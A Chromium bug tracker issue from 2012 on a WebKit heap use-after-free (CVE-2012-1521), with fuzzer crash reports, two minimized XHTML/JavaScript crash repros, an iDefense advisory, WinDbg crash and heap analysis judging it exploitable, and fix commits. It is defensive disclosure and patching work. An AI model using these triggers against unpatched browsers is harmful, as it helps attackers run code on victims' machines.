New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 117110 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Apr 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment

Heap-use-after-free in WebCore::RenderObjectChildList::destroyLeftoverChildren

Project Member Reported by infe...@chromium.org, Mar 7 2012

Issue description

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=22566581

Fuzzer: Bj_doc_fuzzer

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f24bd8567c0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderBlock::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  

Minimized Testcase (3.11 Kb): https://cluster-fuzz.appspot.com/download/AMIfv94wl0siP-kb4br4KcGV-FemuA50XuTG3W8elLcNb8Np5Bv4Z-J6B6Co_4z8wXy58Y69DjPK7biJlo-Kk29PnnBy6s8NLgnsTCrCpsi-FoFeneMeLKWAk4MGgnYTYMxZh5vIRN2qA2P_Vtbn1Fz3fHzAuJHagA
 
 Issue 117111  has been merged into this issue.

Comment 2 Deleted

Cc: rniwa@chromium.org
I didn't get to the bottom of this yet, but here's what I got so far:

1) while parsing repro html:
   a) an appended style tag is created
   b) "DOMSubtreeModified" and onload event handlers are registered
   c) an appended element is created (any element will do)
   d) "DOMSubtreeModified" event handler fires, and calls "document.adoptNode(oHtml)", where oHtml is the documentElement. (I remove the "DOMSubtreeModified" as there's no more need for it)
   e) another appended element is created (any element will do)
2) the "onload" event is fired
... at that point, it appears as if elements get attached to the DOM multiple times, which is detected in ASSERTs. I think this is the reason for the issue; it causes renderers to get freed before the code is done using them. I'm a bit fuzzy on how exactly renderers and elements are associated, so I'm guessing at this point.

I'll continue my investigation on Thursday, but feel free to finish it before then if you're interested.

<html xmlns='http://www.w3.org/1999/xhtml'>
  <style></style>
  <script>
  <![CDATA[
    var oHtml = document.documentElement;
    document.addEventListener("DOMSubtreeModified", function DOMSubtreeModified_handler() {
      document.removeEventListener("DOMSubtreeModified", DOMSubtreeModified_handler, true);
      debugbreak(oHtml);
      document.adoptNode(oHtml);
    }, true);
    window.onload=function(){
      document.execCommand("Superscript");
      document.appendChild(oHtml);
      oHtml.textContent="";
    };
   ]]>
  </script>
  <x/>
  <x/>
</html>
Cc: adamk@chromium.org
Okay, I just cut a lot of the code and replaced it with inline docs. The repro is relatively simple, but I'm not at home with my debug build to do further analysis. I'll have a quick look at the code to see if there's an obvious explanation for this. If not, I'll try to look at this some more when I get back.

<html xmlns="http://www.w3.org/1999/xhtml">
  <style></style>
  <script>
  <![CDATA[
    var oHtml = document.documentElement;
    // At this point, the html element contains the style and script elements, 
    // and a number of text nodes, but not the "x" element or any of the 
    // text nodes that come after the script tag.
    document.removeChild(oHtml); 
    // Even though the html element is no longer attached to the document, chrome
    // will continue to add elements and text nodes to it while parsing the
    // rest of the document.
    window.onload = function() {
      // At this point, all the elements and text nodes have been added to the
      // html element. The html element is attached back to the document:
      document.appendChild(oHtml);
      // and the text node that follows the "x" element is removed:
      oHtml.removeChild(oHtml.lastChild);
      // At this point, stuff is messed up.
      setTimeout("location.reload();", 100);
    };
   ]]>
  </script>
  <x/>
</html>
Labels: -Mstone-17 Mstone-18
Updating milestone. m18 is already out.
Oddly enough ClusterFuzz cannot reproduce with the latests repro.
https://cluster-fuzz.appspot.com/testcase?key=29641344
It crashes reliably for me with the same stack...

Comment 10 by kareng@google.com, Mar 30 2012

Labels: -Mstone-18 Mstone-20

Comment 11 by kareng@google.com, Mar 30 2012

Labels: MovedFrom18
Labels: -Mstone-20 -MovedFrom18 Mstone-18
Reverting wrong marking of security bugs by release management.
iDefense VCP Submission V-874rcfpq7z
04/04/2012
Multiple Vendor WebKit  'RenderObject.m_node' Use After Free Vulnerability

Description:
Remote exploitation of a use-after-free vulnerability in WebKit, as included with multiple vendors' browsers, could allow an attacker to execute arbitrary code with the privileges of the current user.

WebKit is an open-source wWeb browser engine. It is currently used by Apple Inc.'s Safari browser, and Google's Chrome browser. For more information, see the vendor's site at the following link:

http://webkit.org/

This vulnerability occurs when manipulating the DOM tree via asynchronous JavaScript Event Handlers. Specifically, it is possible for the same DOM node to be attached to two different rendering contexts, which can lead to a use-after-free vulnerability when one of the rendering objects is destroyed. The stale reference remains attached to the second rendering object, which triggers a use-after-free vulnerability when it is later destroyed.

Analysis:
Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the Web page. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. After the user visits the malicious Web page, no further user interaction is needed.

To exploit this vulnerability, it is necessary to reallocate a block of freed memory with attacker-controlled data. Labs testing has demonstrated that this is possible and that it can be performed reliably.

If Safari is being used on Windows, iDefense recommends configuring the affected application to use the exploitation mitigations provided by the Microsoft EMET tool linked to in the Sources section. This will not prevent exploitation, but it will make it more complex on platforms that support DEP and ASLR.

Credit:
wushi of team509



    webkit   RenderText::deleteTextBoxes  use after free  Vulnerability

Discovery Date:  Oct 11, 2011
Discovery By :  wushi of team509

Systems Affected

This vulnerability affects the following software :

    * apple safari 5.1.2 and chrome 15.x~17.x (tested on windows & MAC OS )

Overview
webkit  contains a vulnerability. This vulnerability may allow attackers to remotely 
execute arbitrary code on the affected system. Exploitation may occur as the result of using the 
affected webkit application to visit a website. The privileges gained by a remote attacker depend on the software 
component being attacked. 


I. Description:
    unpack the webkit11-18.rar and got the test0.xhtml , open test0.xhtml using safari ,  safari will crash. 


And on windows, the crash will like this:

eax=7ff5d660 ebx=7feeace8 ecx=00790053 edx=5cc3f3c0 esi=7feeace8 edi=7feeaae0
eip=5cc3f33b esp=001beca4 ebp=00000000 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\WebKit.dll - 
WebKit!setUseOpenSourceWebKit+0x81a7b:
5cc3f33b 83792000        cmp     dword ptr [ecx+20h],0 ds:0023:00790073=????????
0:000> k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00000000 00000000 WebKit!setUseOpenSourceWebKit+0x81a7b


we can use chrome to analysis the vuln, because it has symbols.
we use 17.0.941.0 (the newest version of chrome).
eax=00000000 ebx=0519695c ecx=05197194 edx=00000000 esi=05196c04 edi=051969d8
eip=02384d37 esp=0024e6e4 ebp=0024e768 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h] ds:0023:00000450=????????

1:020> kv
DBGHELP: ntdll - public symbols  
         d:\symbols\ntdll.pdb\120028FA453F4CD5A6A404EC37396A582\ntdll.pdb
ChildEBP RetAddr  Args to Child              
0024e6e4 0239f758 05196c04 023a19c7 e7940501 chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe (FPO: [0,0,0]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 288]
0024e6ec 023a19c7 e7940501 05196338 00000000 chrome_1730000!WebCore::dirtyLineBoxesForRenderer+0x41 (FPO: [1,0,1]) (CONV: cdecl) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblocklinelayout.cpp @ 378]
0024e768 0238e62e 0019695c 00000000 0024e701 chrome_1730000!WebCore::RenderBlock::layoutInlineChildren+0x18b (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblocklinelayout.cpp @ 1471]
0024e7fc 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x369 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1293]
0024e810 0238fcb2 05112ca0 0519695c 05196650 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024e858 0238faf3 010000ab 0024e87c 0124e8a8 chrome_1730000!WebCore::RenderBlock::layoutBlockChild+0x19d (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2059]
0024e8bc 0238e63e 0519695c 00000000 0024e8f0 chrome_1730000!WebCore::RenderBlock::layoutBlockChildren+0x23a (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1970]
0024e94c 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x379 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1297]
0024e960 0238fcb2 05112d30 05196650 051964f8 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024e9a8 0238faf3 01000000 0024e9cc 0124e9f8 chrome_1730000!WebCore::RenderBlock::layoutBlockChild+0x19d (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2059]
0024ea0c 0238e63e 05196650 00000000 0024ea40 chrome_1730000!WebCore::RenderBlock::layoutBlockChildren+0x23a (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1970]
0024ea9c 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x379 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1297]
0024eab0 0238fcb2 05113168 051964f8 05196338 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024eaf8 0238faf3 01000000 0024eb1c 0124eb48 chrome_1730000!WebCore::RenderBlock::layoutBlockChild+0x19d (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 2059]
0024eb5c 0238e63e 051964f8 00000000 0024eb90 chrome_1730000!WebCore::RenderBlock::layoutBlockChildren+0x23a (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1970]
0024ebec 0238e2a7 00000000 00000000 00000000 chrome_1730000!WebCore::RenderBlock::layoutBlock+0x379 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1297]
0024ec00 0235c1e0 05196338 00000000 05122450 chrome_1730000!WebCore::RenderBlock::layout+0x1b (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderblock.cpp @ 1172]
0024ec78 023d2351 0024ed6c 05196338 0519641c chrome_1730000!WebCore::RenderView::layout+0x185 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\renderview.cpp @ 137]
0024ecdc 025c89e1 00000001 0510f0d8 02355e70 chrome_1730000!WebCore::FrameView::layout+0x514 (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\page\frameview.cpp @ 1095]
0024ece8 02355e70 0510f0d8 0024ee10 0510f0d8 chrome_1730000!WebCore::Document::updateLayout+0x4a (FPO: [0,0,1]) (CONV: thiscall) [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\dom\document.cpp @ 1641]
1:020> r
eax=00000000 ebx=0519695c ecx=05197194 edx=00000000 esi=05196c04 edi=051969d8
eip=02384d37 esp=0024e6e4 ebp=0024e768 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h] ds:0023:00000450=????????
1:020> u
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 288]:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h]
02384d3d 57              push    edi
02384d3e 8b01            mov     eax,dword ptr [ecx]
02384d40 8b792c          mov     edi,dword ptr [ecx+2Ch]
02384d43 53              push    ebx
02384d44 ff5004          call    dword ptr [eax+4]
02384d47 8bcf            mov     ecx,edi
02384d49 85ff            test    edi,edi
1:020> u eip -10
chrome_1730000!WebCore::RenderText::willBeDestroyed+0x3b [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 232]:
02384d27 c9              leave
02384d28 c3              ret
chrome_1730000!WebCore::RenderText::deleteTextBoxes [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 286]:
02384d29 8b4e2c          mov     ecx,dword ptr [esi+2Ch]
02384d2c 85c9            test    ecx,ecx
02384d2e 7425            je      chrome_1730000!WebCore::RenderText::deleteTextBoxes+0x2c (02384d55)
02384d30 8b4608          mov     eax,dword ptr [esi+8]
02384d33 8b4018          mov     eax,dword ptr [eax+18h]
02384d36 53              push    ebx
1:020> u
chrome_1730000!WebCore::RenderText::deleteTextBoxes+0xe [d:\b\build\slave\chrome-official\build\src\third_party\webkit\source\webcore\rendering\rendertext.cpp @ 288]:
02384d37 8b9850040000    mov     ebx,dword ptr [eax+450h]
02384d3d 57              push    edi
02384d3e 8b01            mov     eax,dword ptr [ecx]
02384d40 8b792c          mov     edi,dword ptr [ecx+2Ch]
02384d43 53              push    ebx
02384d44 ff5004          call    dword ptr [eax+4]
02384d47 8bcf            mov     ecx,edi
02384d49 85ff            test    edi,edi
1:020> dd esi
05196c04  02d9d170 051131f8 05363500 051969d8
05196c14  00000000 05196c48 4040a800 00000000
05196c24  42180000 00000000 051abdf0 05197194
05196c34  05197194 41000000 00000000 00000000
05196c44  43150199 02d9d170 051131f8 05363538
05196c54  051969d8 05196c04 05196da8 0040a820
05196c64  05196b40 0378e4c8 bf800000 05201028
05196c74  00000000 00000000 bf800000 00000000
1:020> dd esi+8
05196c0c  05363500 051969d8 00000000 05196c48
05196c1c  4040a800 00000000 42180000 00000000
05196c2c  051abdf0 05197194 05197194 41000000
05196c3c  00000000 00000000 43150199 02d9d170
05196c4c  051131f8 05363538 051969d8 05196c04
05196c5c  05196da8 0040a820 05196b40 0378e4c8
05196c6c  bf800000 05201028 00000000 00000000
05196c7c  bf800000 00000000 00000000 05196c98
1:020> dd 05363500
05363500  000011cf 00000000 00000000 00000000
05363510  00000000 00000000 00000000 00000000
05363520  00000000 00000000 00000000 00000000
05363530  6748adfe 8c000000 02dcf6a8 02dcf7fc
05363540  03734b68 00000000 00000000 00580a01
05363550  0510f0d8 00000000 00000000 05196da8
05363560  05201438 00000000 6748adf5 8c000000
05363570  02dcf6a8 02dcf7fc 0374dd80 00000000
1:020> !heap -p -a 05363500
    address 05363500 found in
    _HEAP @ 980000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        053634f8 0007 0000  [00]   05363500    00030 - (free)

It's clear the vuln  is exploitable.
Labels: ReleaseBlock-Stable
Let's make sure to fix this one in the next patch, where possible.
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=34044943

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7faabd95dfc0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderInline::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  

Minimized Testcase (0.71 Kb): https://cluster-fuzz.appspot.com/download/AMIfv97Q7JrNdf-dAX6XsUuClhRbSN2oZYy0wUeYwdCLIkVCLbM3qs2XUhsFbEmKhejh42ytqu5zs77DQWjMKPQ7d7z-hOuWRwoH2EonNcd_aRp19mt3hHuXR3lOeOCSc7tT-dEr5HO0TWXzxm3hDgPesjkMEkWEBw

Comment 16 by palmer@google.com, Apr 9 2012

Alarmingly, I get a full browser crash on Linux on M19, not just a renderer crash.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Owner: infe...@chromium.org
Status: FixUnreleased
http://trac.webkit.org/changeset/113670
Project Member

Comment 18 by ClusterFuzz, Apr 11 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=22566581

Fuzzer: Bj_doc_fuzzer

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f24bd8567c0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderBlock::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94wl0siP-kb4br4KcGV-FemuA50XuTG3W8elLcNb8Np5Bv4Z-J6B6Co_4z8wXy58Y69DjPK7biJlo-Kk29PnnBy6s8NLgnsTCrCpsi-FoFeneMeLKWAk4MGgnYTYMxZh5vIRN2qA2P_Vtbn1Fz3fHzAuJHagA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Project Member

Comment 19 by ClusterFuzz, Apr 11 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=34044943

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7faabd95dfc0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderInline::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv97Q7JrNdf-dAX6XsUuClhRbSN2oZYy0wUeYwdCLIkVCLbM3qs2XUhsFbEmKhejh42ytqu5zs77DQWjMKPQ7d7z-hOuWRwoH2EonNcd_aRp19mt3hHuXR3lOeOCSc7tT-dEr5HO0TWXzxm3hDgPesjkMEkWEBw

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Project Member

Comment 20 by ClusterFuzz, Apr 11 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=34044943

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7faabd95dfc0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderInline::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv97Q7JrNdf-dAX6XsUuClhRbSN2oZYy0wUeYwdCLIkVCLbM3qs2XUhsFbEmKhejh42ytqu5zs77DQWjMKPQ7d7z-hOuWRwoH2EonNcd_aRp19mt3hHuXR3lOeOCSc7tT-dEr5HO0TWXzxm3hDgPesjkMEkWEBw

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Project Member

Comment 21 by ClusterFuzz, Apr 11 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=22566581

Fuzzer: Bj_doc_fuzzer

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f24bd8567c0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderBlock::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94wl0siP-kb4br4KcGV-FemuA50XuTG3W8elLcNb8Np5Bv4Z-J6B6Co_4z8wXy58Y69DjPK7biJlo-Kk29PnnBy6s8NLgnsTCrCpsi-FoFeneMeLKWAk4MGgnYTYMxZh5vIRN2qA2P_Vtbn1Fz3fHzAuJHagA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Project Member

Comment 22 by ClusterFuzz, Apr 11 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=34044943

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7faabd95dfc0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderInline::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv97Q7JrNdf-dAX6XsUuClhRbSN2oZYy0wUeYwdCLIkVCLbM3qs2XUhsFbEmKhejh42ytqu5zs77DQWjMKPQ7d7z-hOuWRwoH2EonNcd_aRp19mt3hHuXR3lOeOCSc7tT-dEr5HO0TWXzxm3hDgPesjkMEkWEBw

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Project Member

Comment 23 by ClusterFuzz, Apr 12 2012

ClusterFuzz has detected this issue as fixed in range 131591:131615.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=22566581

Fuzzer: Bj_doc_fuzzer

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f24bd8567c0
Crash State:
  - crash stack -
  WebCore::RenderObjectChildList::destroyLeftoverChildren
  WebCore::RenderBlock::willBeDestroyed
  - free stack -
  WebCore::ContainerNode::removeChildren
  WebCore::Node::setTextContent
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=131591:131615

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94wl0siP-kb4br4KcGV-FemuA50XuTG3W8elLcNb8Np5Bv4Z-J6B6Co_4z8wXy58Y69DjPK7biJlo-Kk29PnnBy6s8NLgnsTCrCpsi-FoFeneMeLKWAk4MGgnYTYMxZh5vIRN2qA2P_Vtbn1Fz3fHzAuJHagA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged
M18: http://trac.webkit.org/changeset/114850
M19: http://trac.webkit.org/changeset/114851
Labels: CVE-2012-1521

Comment 26 by cdn@chromium.org, May 15 2012

Status: Fixed
Marking old security bugs Fixed..
Project Member

Comment 27 by bugdroid1@chromium.org, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 28 by laforge@google.com, Jan 18 2013

Labels: Restrict-View-EditIssue
Project Member

Comment 29 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Area-WebKit -Type-Security -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -Mstone-18 Cr-Content Security-Impact-Stable Security-Impact-Beta Type-Bug-Security M-18 Security-Severity-High Performance-Memory-AddressSanitizer
Project Member

Comment 30 by bugdroid1@chromium.org, Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member

Comment 32 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 33 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 34 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 35 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 36 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 37 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 38 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 39 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment